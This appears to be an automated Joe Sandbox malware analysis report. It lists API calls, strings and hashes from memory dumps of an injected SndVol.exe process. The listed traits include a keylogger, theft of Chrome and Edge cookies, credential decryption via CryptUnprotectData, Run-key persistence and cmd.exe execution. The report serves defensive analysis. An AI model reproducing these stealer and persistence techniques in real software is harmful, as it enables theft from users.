                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PkGNG
                                                                • API String ID: 0-263838557
                                                                • Opcode ID: 31b5396298e6fccfc78706356fe663c712917264f0e1acd7aa1b9484dbd217c1
                                                                • Instruction ID: 855c33fdfb769914c36b17a646fd91fa821b127dc6947adfd6039aafffbc388a
                                                                • Opcode Fuzzy Hash: 31b5396298e6fccfc78706356fe663c712917264f0e1acd7aa1b9484dbd217c1
                                                                • Instruction Fuzzy Hash: 03519CB1A1420EAADF1AEFA8C848EFEBBB9AF49310F041159E415B7290D7719D01CB61
                                                                APIs
                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Enum$InfoQueryValue
                                                                • String ID: [regsplt]
                                                                • API String ID: 3554306468-4262303796
                                                                • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E738
                                                                • _free.LIBCMT ref: 0044E855
                                                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: `#D$`#D
                                                                • API String ID: 885266447-2450397995
                                                                • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                                • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                                • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 00443475
                                                                • _free.LIBCMT ref: 00443540
                                                                • _free.LIBCMT ref: 0044354A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                • API String ID: 2506810119-3942169294
                                                                • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                                • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                                • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\SndVol.exe,00000104), ref: 05394142
                                                                • _free.LIBCMT ref: 0539420D
                                                                • _free.LIBCMT ref: 05394217
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe
                                                                • API String ID: 2506810119-3942169294
                                                                • Opcode ID: af1f721125d16a5649c2614678efed4fcbe5903473eac5654b9f8fee906498df
                                                                • Instruction ID: fbc64a12d615e229907258e8c61d20c02d7a72ba40a0b61034de3df008ee923b
                                                                • Opcode Fuzzy Hash: af1f721125d16a5649c2614678efed4fcbe5903473eac5654b9f8fee906498df
                                                                • Instruction Fuzzy Hash: 113153F1A04618AFDF29DF99DD84DAEBBFDFF95710F104066E40597610D6B08A82CB90
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,00466108,0046C7B0,00000000,00000000,00000000), ref: 053681C2
                                                                  • Part of subcall function 0536D152: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,05354DFC,00465E74), ref: 0536D16B
                                                                • Sleep.KERNEL32(00000064), ref: 053681EE
                                                                • DeleteFileW.KERNEL32(00000000), ref: 05368222
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                • String ID: /t
                                                                • API String ID: 1462127192-3161277685
                                                                • Opcode ID: 4dd0ec4cfeb0374491295f618a4ee3a1ad734328a1d292c32991b8cb660b3280
                                                                • Instruction ID: bd156c43e48156bf305a3e093251128c623287e364b50c9139bef2415e7343b8
                                                                • Opcode Fuzzy Hash: 4dd0ec4cfeb0374491295f618a4ee3a1ad734328a1d292c32991b8cb660b3280
                                                                • Instruction Fuzzy Hash: 04318575B00219AADF04FBA4DCD9EFE7774BF14220F005569ED06670D0EF642E8ACA54
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0539C84B,?,00000000,FF8BC35D), ref: 0539C59F
                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0539C5CD
                                                                • GetLastError.KERNEL32 ref: 0539C5FE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                • String ID: PkGNG
                                                                • API String ID: 2456169464-263838557
                                                                • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                • Instruction ID: 8ddb03e6cba7f95a2a2c8b54c0529c2dce23b3dde01e9817bc61d9dd21ba2cc1
                                                                • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                                                • Instruction Fuzzy Hash: 25315EB5A10219AFDF18CF59DC849EAB7B9EB48301F0444BDE90AD7290DA70ED80CF64
                                                                APIs
                                                                  • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                                                • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                                                                • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                                                APIs
                                                                  • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                                                • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                                                                • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                • wsprintfW.USER32 ref: 0040B1F3
                                                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
                                                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                                                • Opcode Fuzzy Hash: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
                                                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                                                APIs
                                                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                                • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                                                • Opcode Fuzzy Hash: 479f868247490eb8d94e44a3ac1295fc2cb218e13a7b72eda2db3aeddef0bb4d
                                                                • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                                                • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                                                • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                                                • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                                                                • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                                • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                                • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                                • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                                  • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                                • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                                • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 053644EC
                                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,004590C0,?), ref: 0536451A
                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,004590C0,?,?,?,?,?,0535DC77,?,00000000), ref: 05364525
                                                                Strings
                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 053644EA
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                • API String ID: 1818849710-1051519024
                                                                • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                • Instruction ID: a2bd7b0d685ded0c82b6323c57d5164527f1d3f96dd54000183d06e0d99f6f57
                                                                • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                                                • Instruction Fuzzy Hash: 00F06D72540218FBDF00AFA0EC49FEE376CFF00A61F008968BD0696150EB719F04DA50
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0536444B
                                                                • RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 05364473
                                                                • RegCloseKey.ADVAPI32(0046611C,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000,?,0535942A,00000001), ref: 0536447E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: Control Panel\Desktop
                                                                • API String ID: 1818849710-27424756
                                                                • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                • Instruction ID: 94a96eda6226da60c8962c11b6fa210f964f29b381838f9dc6fb5cbc2062fbfa
                                                                • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                                                • Instruction Fuzzy Hash: E6F09072540218FFDF01AFA0DC49EEA376CEF04A61F108668BD0AA6051EB319E14DA90
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                                • ShowWindow.USER32(00000009), ref: 00416C61
                                                                • SetForegroundWindow.USER32 ref: 00416C6D
                                                                  • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                                  • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                                  • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                                  • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 186401046-604454484
                                                                • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                                • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                                • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
